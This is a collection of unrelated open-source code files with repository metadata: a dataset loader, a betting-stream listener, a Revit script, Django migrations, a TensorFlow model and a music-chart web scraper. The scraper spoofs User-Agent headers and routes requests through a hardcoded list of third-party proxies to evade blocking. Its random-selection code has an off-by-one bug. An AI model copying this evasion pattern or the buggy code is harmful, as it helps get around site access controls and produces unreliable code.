196640e93c3fb69f365d16802339e2aa1414300b | 739e41d4f24f79c772d266cded0de9b759c6e953 | /venv/lib/python3.6/site-packages/nlp/datasets/winogrande/61dcf44f5c98e1c1c1526feabb5b487d0362949de206a1208b95d9042b89378c/winogrande.py | 6e0be715a32acff4004245b67b56d63b2cb8574b | [
"MIT"
] | permissive | MachineLearningBCAM/Minimax-risk-classifiers-NeurIPS-2020 | 24b7bbdecf459292f8b58be286feab3b9aa341ba | 82586c632268c103de269bcbffa5f7849b174a29 | refs/heads/main | 2023-05-18T15:41:13.495286 | 2021-06-11T18:21:35 | 2021-06-11T18:21:35 | 304,268,819 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,433 | py | """TODO(winogrande): Add a description here."""
from __future__ import absolute_import, division, print_function
import csv
import json
import os
import nlp
# TODO(winogrande): BibTeX citation
_CITATION = """\
@InProceedings{ai2:winogrande,
title = {WinoGrande: An Adversarial Winograd Schema Challenge at Scale},
authors={Keisuke, Sakaguchi and Ronan, Le Bras and Chandra, Bhagavatula and Yejin, Choi
},
year={2019}
}
"""
# TODO(winogrande):
_DESCRIPTION = """\
WinoGrande is a new collection of 44k problems, inspired by Winograd Schema Challenge (Levesque, Davis, and Morgenstern
2011), but adjusted to improve the scale and robustness against the dataset-specific bias. Formulated as a
fill-in-a-blank task with binary options, the goal is to choose the right option for a given sentence which requires
commonsense reasoning.
"""
_URL = 'https://storage.googleapis.com/ai2-mosaic/public/winogrande/winogrande_1.1.zip'
_SIZES = ['xs', 's', 'm', 'l', 'xl']
class WinograndeConfig(nlp.BuilderConfig):
""" BuilderConfig for Discofuse"""
def __init__(self,
data_size,
**kwargs
):
"""
Args:
data_size: the size of the training set we want to us (xs, s, m, l, xl)
**kwargs: keyword arguments forwarded to super.
"""
super(WinograndeConfig, self).__init__(
version=nlp.Version(
"1.0.0",
"New split API (https://tensorflow.org/datasets/splits)"),
**kwargs)
self.data_size = data_size
class Winogrande(nlp.GeneratorBasedBuilder):
"""TODO(winogrande): Short description of my dataset."""
# TODO(winogrande): Set up version.
VERSION = nlp.Version('1.1.0')
BUILDER_CONFIGS = [
WinograndeConfig(
name='winogrande_'+size,
description='AI2 dataset',
data_size=size
) for size in _SIZES
]
def _info(self):
# TODO(winogrande): Specifies the nlp.DatasetInfo object
return nlp.DatasetInfo(
# This is the description that will appear on the datasets page.
description=_DESCRIPTION,
# nlp.features.FeatureConnectors
features=nlp.Features({
'sentence': nlp.Value('string'),
'option1': nlp.Value('string'),
'option2': nlp.Value('string'),
'answer': nlp.Value('string')
# These are the features of your dataset like images, labels ...
}),
# If there's a common (input, target) tuple from the features,
# specify them here. They'll be used if as_supervised=True in
# builder.as_dataset.
supervised_keys=None,
# Homepage of the dataset for documentation
homepage='https://leaderboard.allenai.org/winogrande/submissions/get-started',
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
# TODO(winogrande): Downloads the data and defines the splits
# dl_manager is a nlp.download.DownloadManager that can be used to
# download and extract URLs
dl_dir = dl_manager.download_and_extract(_URL)
data_dir = os.path.join(dl_dir, 'winogrande_1.1')
return [
nlp.SplitGenerator(
name=nlp.Split.TRAIN,
# These kwargs will be passed to _generate_examples
gen_kwargs={
'filepath': os.path.join(data_dir, 'train_{}.jsonl'.format(self.config.data_size)),
#'labelpath': os.path.join(data_dir, 'train_{}-labels.lst'.format(self.config.data_size)),
'split':'train'
},
),
nlp.SplitGenerator(
name=nlp.Split.TEST,
# These kwargs will be passed to _generate_examples
gen_kwargs={
'filepath': os.path.join(data_dir, 'test.jsonl'),
'split': 'test'
},
),
nlp.SplitGenerator(
name=nlp.Split.VALIDATION,
# These kwargs will be passed to _generate_examples
gen_kwargs={
'filepath': os.path.join(data_dir, 'dev.jsonl'),
#'labelpath': os.path.join(data_dir, 'dev-labels.lst'),
'split': 'dev'
},
),
]
def _generate_examples(self, filepath, split):
"""Yields examples."""
# TODO(winogrande): Yields (key, example) tuples from the dataset
with open(filepath) as f:
for id_, row in enumerate(f):
data = json.loads(row)
if split=='test':
yield id_, {
'sentence': data['sentence'],
'option1': data['option1'],
'option2': data['option2'],
'answer': ''
}
else:
yield id_,{
'sentence': data['sentence'],
'option1': data['option1'],
'option2': data['option2'],
'answer': data['answer']
}
# def _generate_test_example(filepath, split, labelpath=None):
# with open(filepath) as f:
# for id_, row in enumerate(f):
# data = json.loads(row)
# yield id_,{
# 'sentence': data['sentence'],
# 'option1': data['option1'],
# 'option2': data['option2'],
# 'answer': None
# }
| [
"adiaz@bcamath.org"
] | adiaz@bcamath.org |
24981d1ca550c828a9733f5955126a18a2d925b3 | 0aa98e0e7d9b63179eaaecd406e0b726594bed1e | /betfairlightweight/streaming/listener.py | c698f37f883a7971c3b36d6f140d8676a5e595c0 | [
"MIT"
] | permissive | alexeypavlenko/betfairlightweight | ce16c60cc8872961ca25452836098c90780ad84a | 3841ca88466abf08152b7a4d2b8fced196307105 | refs/heads/master | 2021-01-11T12:26:51.787855 | 2016-12-11T09:06:29 | 2016-12-11T09:06:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,568 | py | import json
import logging
import time
from .stream import MarketStream, OrderStream
class BaseListener:
def __init__(self):
self.market_stream = None
self.order_stream = None
def register_stream(self, unique_id, operation):
if operation == 'authentication':
logging.info('[Listener: %s]: %s' % (unique_id, operation))
elif operation == 'marketSubscription':
if self.market_stream is not None:
logging.warning('[Listener: %s]: marketSubscription stream already registered, replacing data' %
unique_id)
self.market_stream = self._add_stream(unique_id, operation)
elif operation == 'orderSubscription':
if self.order_stream is not None:
logging.warning('[Listener: %s]: orderSubscription stream already registered, replacing data' %
unique_id)
self.order_stream = self._add_stream(unique_id, operation)
def on_data(self, raw_data):
print(raw_data)
def _add_stream(self, unique_id, operation):
print('Register: %s %s' % (operation, unique_id))
def __str__(self):
return '<BaseListener>'
def __repr__(self):
return str(self)
class StreamListener(BaseListener):
"""Stream listener, processes results from socket,
holds a market and order stream which hold
market_book caches
"""
def __init__(self, output_queue=None):
super(StreamListener, self).__init__()
self.output_queue = output_queue
def on_data(self, raw_data):
"""Called when raw data is received from connection.
Override this method if you wish to manually handle
the stream data
:param raw_data: Received raw data
:return: Return False to stop stream and close connection
"""
try:
data = json.loads(raw_data)
except ValueError:
logging.error('value error: %s' % raw_data)
return
unique_id = data.get('id')
if self._error_handler(data, unique_id):
return False
operation = data.get('op')
if operation == 'connection':
self._on_connection(data, unique_id)
elif operation == 'status':
self._on_status(data, unique_id)
elif operation == 'mcm' or operation == 'ocm':
self._on_change_message(data, unique_id)
def _on_connection(self, data, unique_id):
"""Called on collection operation
:param data: Received data
"""
self.connection_id = data.get('connectionId')
logging.info('[Connect: %s]: connection_id: %s' % (unique_id, self.connection_id))
@staticmethod
def _on_status(data, unique_id):
"""Called on status operation
:param data: Received data
"""
status_code = data.get('statusCode')
logging.info('[Subscription: %s]: %s' % (unique_id, status_code))
def _on_change_message(self, data, unique_id):
change_type = data.get('ct', 'UPDATE')
operation = data.get('op')
if operation == 'mcm':
stream = self.market_stream
else:
stream = self.order_stream
logging.debug('[Subscription: %s]: %s: %s' % (unique_id, change_type, data))
if change_type == 'SUB_IMAGE':
stream.on_subscribe(data)
elif change_type == 'RESUB_DELTA':
stream.on_resubscribe(data)
elif change_type == 'HEARTBEAT':
stream.on_heartbeat(data)
elif change_type == 'UPDATE':
stream.on_update(data)
def _add_stream(self, unique_id, stream_type):
if stream_type == 'marketSubscription':
return MarketStream(unique_id, self.output_queue)
elif stream_type == 'orderSubscription':
return OrderStream(unique_id, self.output_queue)
@staticmethod
def _error_handler(data, unique_id):
"""Called when data first received
:param data: Received data
:param unique_id: Unique id
:return: True if error present
"""
status_code = data.get('statusCode')
connection_closed = data.get('connectionClosed')
if status_code == 'FAILURE':
logging.error('[Subscription: %s] %s: %s' %
(unique_id, data.get('errorCode'), data.get('errorMessage')))
if connection_closed:
return True
def __str__(self):
return '<StreamListener>'
| [
"paulingliam@gmail.com"
] | paulingliam@gmail.com |
d361163583c2c32c54d91c8e8707524d150b297a | a110cda0dd755a0aeeccaa349de5b7c8f836f7d9 | /Dynamo_0.7.X/markerAndTextDisplayStyle.py | 390152422c99ba55f8f8ecbba14bd663d5c5819d | [] | no_license | ksobon/archi-lab | 26d93ef07e4f571e73a78bc40299edd3dc84c2a6 | 9a8a57eccca899ace78a998dc7698ff7754fae6b | refs/heads/master | 2021-01-15T09:37:06.045588 | 2020-06-03T15:55:46 | 2020-06-03T15:55:46 | 26,090,112 | 6 | 5 | null | 2020-02-09T04:24:41 | 2014-11-02T19:02:28 | Python | UTF-8 | Python | false | false | 4,562 | py | #Copyright(c) 2015, Konrad K Sobon
# @arch_laboratory, http://archi-lab.net
import clr
clr.AddReference('ProtoGeometry')
from Autodesk.DesignScript.Geometry import *
# Import DocumentManager and TransactionManager
clr.AddReference("RevitServices")
import RevitServices
from RevitServices.Persistence import DocumentManager
from RevitServices.Transactions import TransactionManager
from System.Collections.Generic import *
# Import RevitAPI
clr.AddReference("RevitAPI")
import Autodesk
from Autodesk.Revit.DB import *
from Autodesk.Revit.DB.Analysis import *
doc = DocumentManager.Instance.CurrentDBDocument
uiapp = DocumentManager.Instance.CurrentUIApplication
app = uiapp.Application
# Import ToDSType(bool) extension method
clr.AddReference("RevitNodes")
import Revit
clr.ImportExtensions(Revit.Elements)
#The inputs to this node will be stored as a list in the IN variable.
dataEnteringNode = IN
points = IN[0]
values = IN[1]
colorSettings = IN[2]
legendSettings = IN[3]
markerSettings = IN[4]
displayStyleName = IN[5]
analysisResultName = IN[6]
analysisResultDescription = IN[7]
unitNames = IN[8]
unitMultipliers = IN[9]
displayUnit = IN[10]
message = ""
def dsPointToRvtPoint(dsPoint):
factor = 3.2808398950
x = dsPoint.X * factor
y = dsPoint.Y * factor
z = dsPoint.Z * factor
return Autodesk.Revit.DB.XYZ(x,y,z)
def chunks(data, n):
if n < 1:
n = 1
return [data[i:i + n] for i in range(0, len(data), n)]
#"Start" the transaction
TransactionManager.Instance.EnsureInTransaction(doc)
#create spatial field manager if one doesnt already exist
sfm = SpatialFieldManager.GetSpatialFieldManager(doc.ActiveView)
if sfm == None:
sfm = SpatialFieldManager.CreateSpatialFieldManager(doc.ActiveView, 1)
sfm.Clear()
#get result schema index if existing else crete one
regResults = sfm.GetRegisteredResults()
if len(regResults) != 0:
for i in regResults:
if sfm.GetResultSchema(i).Name == analysisResultName:
resultSchema = sfm.GetResultSchema(i)
else:
resultSchema = AnalysisResultSchema(analysisResultName, analysisResultDescription)
names = List[str]()
multipliers = List[float]()
for i,j in zip(unitMultipliers, unitNames):
multipliers.Add(i)
names.Add(j)
resultSchema.SetUnits(names, multipliers)
for i in range(0, resultSchema.GetNumberOfUnits(), 1):
if resultSchema.GetUnitsName(i) == displayUnit:
resultSchema.CurrentUnits = i
message = "Success! Remember that your current \ndisplay units are set to " + displayUnit
else:
continue
if resultSchema.GetUnitsName(resultSchema.CurrentUnits) != displayUnit:
message = "Display Units supplied not available. \nEither add those units to results or \nspecify one of the already supplied."
schemaIndex = sfm.RegisterResult(resultSchema)
#create spatial field primitives and assign values to points
points = chunks(points, 999)
values = chunks(values, 999)
for i, j in zip(points, values):
fieldPoints = List[Autodesk.Revit.DB.XYZ]()
for point in i:
fieldPoints.Add(dsPointToRvtPoint(point))
pnts = FieldDomainPointsByXYZ(fieldPoints)
fieldPoints.Clear()
valList = List[ValueAtPoint]()
doubleList = List[float]()
for value in j:
doubleList.Add(float(value))
valList.Add(ValueAtPoint(doubleList))
doubleList.Clear()
vals = FieldValues(valList)
valList.Clear()
idx = sfm.AddSpatialFieldPrimitive()
sfm.UpdateSpatialFieldPrimitive(idx, pnts, vals, schemaIndex)
#define analysis display style and set legend/color settings
collector = FilteredElementCollector(doc)
collection = collector.OfClass(AnalysisDisplayStyle).ToElements()
displayStyle = []
for i in collection:
if i.Name == displayStyleName and i.HasMarkersAndTextSettings():
displayStyle.append(i)
elif i.Name == displayStyleName and not i.HasMarkersAndTextSettings():
message = "Specified Display Style name already \nexists; please supply different name"
else:
continue
if len(displayStyle) == 0:
try:
analysisDisplayStyle = AnalysisDisplayStyle.CreateAnalysisDisplayStyle(doc, displayStyleName, markerSettings, colorSettings, legendSettings)
except:
pass
else:
analysisDisplayStyle = displayStyle[0]
analysisDisplayStyle.SetLegendSettings(legendSettings)
analysisDisplayStyle.SetColorSettings(colorSettings)
analysisDisplayStyle.SetMarkersAndTextSettings(markerSettings)
try:
doc.ActiveView.AnalysisDisplayStyleId = analysisDisplayStyle.Id
except:
pass
# "End" the transaction
TransactionManager.Instance.TransactionTaskDone()
#Assign your output to the OUT variable
if len(message) != 0:
OUT = '\n'.join('{:^35}'.format(s) for s in message.split('\n'))
else:
OUT = 0
| [
"ksobon1986@gmail.com"
] | ksobon1986@gmail.com |
941fad21374a597dfb5c097d482af2e93d687dab | 2951174fd6d8a7cf9a71e0663ae3b22bd309be5a | /yinyuetai.py | ef78c8285d10e9124070a491e1d831f446d99c16 | [] | no_license | WhiteBrownBottle/Python- | c76045a3127723666083cee4b4c20b08491e4067 | 92fcaba555a566eae829ea401a20f459b4f39dfe | refs/heads/master | 2021-07-18T21:17:45.677091 | 2017-10-24T06:47:38 | 2017-10-24T06:47:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,953 | py | import os
import requests
import bs4
import random
def get_html(url):
try:
r = requests.get(url, timeout = 30)
r.raise_for_status
r.encoding = r.apparent_encoding
return r.text
except:
return 'Something wrong!'
def get_agent():
'''
模拟header的user-agent字段,
返回一个随机的user-agent字典类型的键值对
:return:
'''
agents = ['Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1',
'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)']
fakeheader = {}
fakeheader['User-agent'] = agents[random.randint(0, len(agents))]
return fakeheader
def get_proxy():
'''
简单模拟代理池
返回一个字典类型的键值对
:return:
'''
proxy = ["http://203.91.121.76:3128",
"http://123.7.38.31:9999",
"http://218.56.132.155:8080",
"http://220.249.185.178:9999",
"http://218.66.253.145:8800",
"http://110.73.15.81:80",
"http://61.163.39.70:9999",
"http://27.44.174.134:9999"]
fakepxs = {}
fakepxs['http'] = proxy[random.randint(0, len(proxy))]
return fakepxs
def get_content(url):
#我们来打印一下表头
if url[-2:] == 'ML':
print('内地排行榜')
elif url[-2:] == 'HT':
print('港台排行榜')
elif url[-2:] == 'US':
print('欧美排行榜')
elif url[-2:] == 'KR':
print('韩国排行榜')
else:
print('日本排行榜')
#找到我们需要的每一个标签
html = get_html(url)
soup = bs4.BeautifulSoup(html, 'lxml')
li_list = soup.find_all('li', attrs={'name' : 'dmvLi'})
for li in li_list:
match = {}
try:
# 判断分数的升降!
if li.find('h3', class_='desc_score'):
match['分数'] = li.find('h3', class_='desc_score').text
else:
match['分数'] = li.find('h3', class_='asc_score').text
match['排名'] = li.find('div', class_='top_num').text
match['名字'] = li.find('a', class_='mvname').text
match['发布时间'] = li.find('p', class_='c9').text
match['歌手'] = li.find('a', class_='special').text
except:
return ""
print(match)
def main():
base_url = "http://vchart.yinyuetai.com/vchart/trends?area="
suffix = ['ML','HT','US','JP','KR']
for suff in suffix:
url = base_url+suff
print()
get_content(url)
if __name__ == '__main__':
main() | [
"958255724@qq.com"
] | 958255724@qq.com |
c9ad0beaf717d4624106ae4450733c77f377bf54 | f97242dfbe3c629dcabb6226b59aaf808a5b1cec | /project/analysis/migrations/0002_auto_20151216_1041.py | ba6d0fa627953bddd0602f1598b1068dc1b19f8c | [] | no_license | shapiromatron/genomics | ab48cc2d7eab94e9777ffce0ee7d5865af7d7ae1 | 8cabcaf7a6a04cd84fdefca6a39c9fde5f3329c8 | refs/heads/master | 2021-01-21T04:50:24.186897 | 2016-06-10T19:52:24 | 2016-06-10T19:52:24 | 44,177,551 | 0 | 1 | null | 2016-06-10T19:44:42 | 2015-10-13T13:19:32 | Python | UTF-8 | Python | false | false | 2,020 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('analysis', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='analysis',
options={'verbose_name_plural': 'Analyses'},
),
migrations.AlterModelOptions(
name='analysisdatasets',
options={'verbose_name_plural': 'Analysis datasets'},
),
migrations.AlterModelOptions(
name='datasetcorrelationmatrix',
options={'verbose_name_plural': 'Dataset correlation matrices'},
),
migrations.AlterModelOptions(
name='featurelistcountmatrix',
options={'verbose_name_plural': 'Feature list count matrices'},
),
migrations.AlterField(
model_name='datasetcorrelationmatrix',
name='matrix',
field=models.FileField(max_length=256, upload_to=''),
),
migrations.AlterField(
model_name='featurelistcountmatrix',
name='matrix',
field=models.FileField(max_length=256, upload_to=''),
),
migrations.AlterField(
model_name='genomicdataset',
name='data_ambiguous',
field=models.FileField(max_length=256, blank=True, upload_to=''),
),
migrations.AlterField(
model_name='genomicdataset',
name='data_minus',
field=models.FileField(max_length=256, blank=True, upload_to=''),
),
migrations.AlterField(
model_name='genomicdataset',
name='data_plus',
field=models.FileField(max_length=256, blank=True, upload_to=''),
),
migrations.AlterField(
model_name='genomicdataset',
name='genome_assembly',
field=models.PositiveSmallIntegerField(choices=[(1, 'hg19'), (2, 'mm9')]),
),
]
| [
"shapiromatron@gmail.com"
] | shapiromatron@gmail.com |
21b9439764ab2bc2b66440c6d24e63f1b755f5c2 | 4d586ecc9febedb199376bc005eb783c55fae7b0 | /great_expectations/expectations/core/expect_column_values_to_match_like_pattern.py | c6a927e14227c06c8ace633c79c429646d7294f7 | [
"Apache-2.0"
] | permissive | spbail/great_expectations | 1db532763ad9c5c07aec251b64a61de3fb6f677f | c4fa245f77912dfdfd613c84fb75f631c0b73f03 | refs/heads/main | 2023-07-01T23:40:44.586052 | 2021-04-22T00:09:35 | 2021-04-22T00:09:35 | 360,619,476 | 2 | 0 | Apache-2.0 | 2021-04-22T17:20:19 | 2021-04-22T17:20:18 | null | UTF-8 | Python | false | false | 2,792 | py | from typing import Optional
from great_expectations.core.expectation_configuration import ExpectationConfiguration
from great_expectations.expectations.util import render_evaluation_parameter_string
from ...render.renderer.renderer import renderer
from ...render.util import substitute_none_for_missing
from ..expectation import ColumnMapExpectation, InvalidExpectationConfigurationError
try:
import sqlalchemy as sa
except ImportError:
pass
class ExpectColumnValuesToMatchLikePattern(ColumnMapExpectation):
library_metadata = {
"maturity": "production",
"package": "great_expectations",
"tags": ["core expectation", "column map expectation"],
"contributors": [
"@great_expectations",
],
"requirements": [],
}
map_metric = "column_values.match_like_pattern"
success_keys = (
"mostly",
"like_pattern",
)
default_kwarg_values = {
"like_pattern": None,
"row_condition": None,
"condition_parser": None, # we expect this to be explicitly set whenever a row_condition is passed
"mostly": 1,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": True,
}
def validate_configuration(self, configuration: Optional[ExpectationConfiguration]):
super().validate_configuration(configuration)
try:
assert "like_pattern" in configuration.kwargs, "Must provide like_pattern"
assert isinstance(
configuration.kwargs.get("like_pattern"), (str, dict)
), "like_pattern must be a string"
if isinstance(configuration.kwargs.get("like_pattern"), dict):
assert "$PARAMETER" in configuration.kwargs.get(
"like_pattern"
), 'Evaluation Parameter dict for like_pattern kwarg must have "$PARAMETER" key.'
except AssertionError as e:
raise InvalidExpectationConfigurationError(str(e))
return True
@classmethod
@renderer(renderer_type="renderer.prescriptive")
@render_evaluation_parameter_string
def _prescriptive_renderer(
cls,
configuration=None,
result=None,
language=None,
runtime_configuration=None,
**kwargs
):
runtime_configuration = runtime_configuration or {}
include_column_name = runtime_configuration.get("include_column_name", True)
include_column_name = (
include_column_name if include_column_name is not None else True
)
styling = runtime_configuration.get("styling")
params = substitute_none_for_missing(
configuration.kwargs,
["column", "mostly", "row_condition", "condition_parser"],
)
| [
"noreply@github.com"
] | spbail.noreply@github.com |
5b2498d10e6e0f7de3e78241053183a155df9a95 | ce73929de648d080420fc99a86e7b73bfb15f0dc | /tms_maintenance/__openerp__.py | 67959bfef32db6801dfb3d8b4b7b99f04d6e8f0e | [] | no_license | thinkasoft/TMS | dce16ee4b10f9e35d392c883b443f556946d9526 | d8d07227749e07e047a03713142c0bb898a9abf6 | refs/heads/master | 2021-01-10T02:31:22.526633 | 2016-02-01T22:25:00 | 2016-02-01T22:25:00 | 50,875,749 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,922 | py | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012 HESATEC (<http://www.hesatecnica.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
{
"name" : "Fleet Maintenance Workshop Management",
"version" : "1.0",
"category" : "Vertical",
'complexity': "normal",
"author" : "HESATEC",
"website": "http://www.hesatecnica.com",
"depends" : ["tms","stock_move_entries"],
"description": """
Fleet Maintenance Workshop Management
=========================================
This application allows you to manage an Fleet Maintenance Workshop, very useful when Compnay has its own Maintenance Workshop.
It handles full Maintenance Workflow:
Opening Maintenance Order => Warehouse Integration => Closing Maintenance Order
Also, you can manage:
- Several Workshops
- Preventive Maintenance Cycles
- Corrective Maintenance
- Warehouse Integration for spare parts
Takes from Freight Management Module:
- Vehicles
- Trucks Red Tapes
- Truck Odometers
""",
"data" : [
'security/tms_security.xml',
'security/ir.model.access.csv',
'product_view.xml',
'tms_maintenance_view.xml',
'tms_maintenance_order_view.xml',
'tms_maintenance_order_activity_view.xml',
'tms_product_line_view.xml',
'sale_view.xml',
'tms_activity_control_time_view.xml',
'tms_time_view.xml',
'tms_analisys_01_view.xml',
'tms_analisys_02_view.xml',
'tms_analisys_03_view.xml',
'tms_analisys_04_view.xml',
#'tms_analisys_05_view.xml',
#'activities_to_invoice_view.xml',
#'create_invoice_view.xml',
'stock_view.xml',
'tms_maintenance_driver_report_view.xml',
'ir_config_parameter.xml'
],
"active": False,
'application': True,
"installable": True
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"you@example.com"
] | you@example.com |
2777fc95d9b7160b0a91a6bd8f318fee534d933e | 8bccc05fcb3cfc6ed93991927a514a96f53f7ec0 | /old_version/candidate_selection/tensorflow_models/baselines/entity_embedding_vs_gold.py | bf4932a2a4dc0e677e69a935306211c2a78dac5a | [
"MIT"
] | permissive | afcarl/QuestionAnsweringGCN | 54101c38549405d65ef22e38fed9e5bd58122ada | e9c1987b40a553f0619fa796f692c8880de32846 | refs/heads/master | 2020-03-20T10:35:55.729170 | 2018-06-07T11:45:12 | 2018-06-07T11:45:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,137 | py | import tensorflow as tf
from candidate_selection.tensorflow_hypergraph_representation import TensorflowHypergraphRepresentation
from candidate_selection.tensorflow_models.abstract_tensorflow_model import AbstractTensorflowModel
from candidate_selection.tensorflow_models.components.decoders.softmax_decoder import SoftmaxDecoder
from candidate_selection.tensorflow_models.components.embeddings.sequence_embedding import SequenceEmbedding
from candidate_selection.tensorflow_models.components.embeddings.static_vector_embedding import StaticVectorEmbedding
from candidate_selection.tensorflow_models.components.embeddings.vector_embedding import VectorEmbedding
from candidate_selection.tensorflow_models.components.extras.embedding_retriever import EmbeddingRetriever
from candidate_selection.tensorflow_models.components.extras.mean_gold_embedding_retriever import \
MeanGoldEmbeddingRetriever
from candidate_selection.tensorflow_models.components.extras.target_comparator import TargetComparator
from candidate_selection.tensorflow_models.components.vector_encoders.multilayer_perceptron import MultilayerPerceptron
from candidate_selection.tensorflow_sentence_representation import TensorflowSentenceRepresentation
class EntityEmbeddingVsGold(AbstractTensorflowModel):
def get_preprocessor_stack_types(self):
preprocessor_stack_types = ["hypergraph", "gold", "sentence"]
if self.model_settings["static_entity_embeddings"]:
preprocessor_stack_types += ["static_entity_embeddings"]
return preprocessor_stack_types
def initialize_graph(self):
if not self.model_settings["static_entity_embeddings"]:
self.entity_embedding = VectorEmbedding(self.entity_indexer, self.variables, variable_prefix="entity")
self.add_component(self.entity_embedding)
else:
self.entity_embedding = StaticVectorEmbedding(self.entity_indexer, self.variables, variable_prefix="entity")
self.add_component(self.entity_embedding)
self.hypergraph = TensorflowHypergraphRepresentation(self.variables)
self.add_component(self.hypergraph)
self.mean_gold_embedding_retriever = MeanGoldEmbeddingRetriever(self.variables, variable_prefix="gold_lookup")
self.add_component(self.mean_gold_embedding_retriever)
#self.question_sentence = TensorflowSentenceRepresentation(self.variables)
#self.add_component(self.question_sentence)
#self.word_embedding = SequenceEmbedding(self.word_indexer, self.variables, variable_prefix="word")
#self.add_component(self.word_embedding)
self.target_comparator = TargetComparator(self.variables, variable_prefix="comparison_to_sentence", comparison="concat")
self.add_component(self.target_comparator)
self.decoder = SoftmaxDecoder(self.variables)
self.add_component(self.decoder)
self.sentence_to_graph_mapper = EmbeddingRetriever(self.variables, duplicate_policy="sum", variable_prefix="mapper")
self.add_component(self.sentence_to_graph_mapper)
self.transformation = MultilayerPerceptron([self.model_settings["entity_embedding_dimension"],
self.model_settings["entity_embedding_dimension"]],
self.variables,
variable_prefix="transformation",
l2_scale=self.model_settings["regularization_scale"])
self.add_component(self.transformation)
self.vertex_transformation = MultilayerPerceptron([self.model_settings["entity_embedding_dimension"],
self.model_settings["entity_embedding_dimension"]],
self.variables,
variable_prefix="transformation",
l2_scale=self.model_settings["regularization_scale"])
self.add_component(self.vertex_transformation)
self.final_transformation = MultilayerPerceptron([2*self.model_settings["entity_embedding_dimension"],
4 * self.model_settings["entity_embedding_dimension"],
1],
self.variables,
variable_prefix="transformation",
l2_scale=self.model_settings["regularization_scale"])
self.add_component(self.final_transformation)
def set_indexers(self, indexers):
self.entity_indexer = indexers.entity_indexer
def compute_entity_scores(self):
self.hypergraph.entity_vertex_embeddings = self.entity_embedding.get_representations()
self.hypergraph.entity_vertex_embeddings = tf.Print(self.hypergraph.entity_vertex_embeddings, [self.hypergraph.entity_vertex_embeddings], message="embeddings", summarize=100)
gold_embeddings = self.mean_gold_embedding_retriever.get_representations(self.hypergraph.entity_vertex_embeddings)
#gold_embeddings = tf.Print(gold_embeddings, [gold_embeddings], message="Gold: ", summarize=5)
#gold_embeddings = self.transformation.transform(gold_embeddings)
vertex_embeddings = self.hypergraph.entity_vertex_embeddings #self.vertex_transformation.transform(self.hypergraph.entity_vertex_embeddings)
#gold_embeddings = tf.Print(gold_embeddings, [self.hypergraph.entity_vertex_embeddings], message="Vertices: ", summarize=100)
hidden = self.target_comparator.get_comparison_scores(gold_embeddings, vertex_embeddings)
entity_scores = tf.squeeze(self.final_transformation.transform(hidden))
entity_scores = tf.Print(entity_scores, [entity_scores], summarize=25, message="entity_scores: ")
#entity_scores = tf.Print(entity_scores, [entity_scores], message="Scores: ", summarize=25)
return entity_scores | [
"michael.sejr@gmail.com"
] | michael.sejr@gmail.com |
733d22a07c4e1178875dce93e145e10c84489699 | c68d238ac786a42c4dd47d4ab5820709aa4dcdb3 | /ExFin/credit/migrations/0003_creditrateup.py | 2057cb69f91adc42bdaa82ecbdcd2ee1441e312d | [] | no_license | tenebranum/ExFin | b78d2a9651d5b9e8fb0fae3adccc48f7897221d2 | 7ac7b7a0be00537a6a600721009f4a28eb90c3ab | refs/heads/master | 2022-12-14T21:17:02.334600 | 2022-09-21T10:33:27 | 2022-09-21T10:33:27 | 139,338,729 | 0 | 0 | null | 2022-12-08T00:59:15 | 2018-07-01T15:07:52 | Python | UTF-8 | Python | false | false | 1,110 | py | # Generated by Django 2.0.2 on 2018-03-06 14:58
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('credit', '0002_auto_20180303_1408'),
]
operations = [
migrations.CreateModel(
name='CreditRateUp',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('icon_class', models.CharField(choices=[('cash', 'Наличка'), ('stick-man', 'Пенсионер'), ('sticker', 'Стикер')], max_length=128, verbose_name='Иконка')),
('credit_rate', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='credit.CreditRate', verbose_name='Кредитный тариф')),
],
options={
'verbose_name_plural': 'Популярные кредитные тарифы, вверху на главной',
'verbose_name': 'Популярный кредитный тариф',
},
),
]
| [
"vetal969696@gmail.com"
] | vetal969696@gmail.com |
5066a140ff8819c7e2b0f4236f3dadc455c60f9e | 72328633f1b4640868c2ba7af81adcca6350e7da | /07-动态规划/2-动态规划问题/03-064.py | a9ae8d6e8865cff23c72daa24b567b07e52219f0 | [] | no_license | qiaozhi827/leetcode-1 | a9f10192c74a6de498bce0fa7e1d995bf67edec4 | 1d1ffe25d8b49832acc1791261c959ce436a6362 | refs/heads/master | 2022-11-06T19:39:32.792946 | 2020-07-05T06:23:27 | 2020-07-05T06:23:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 872 | py | class Solution(object):
def minPathSum(self, grid):
"""
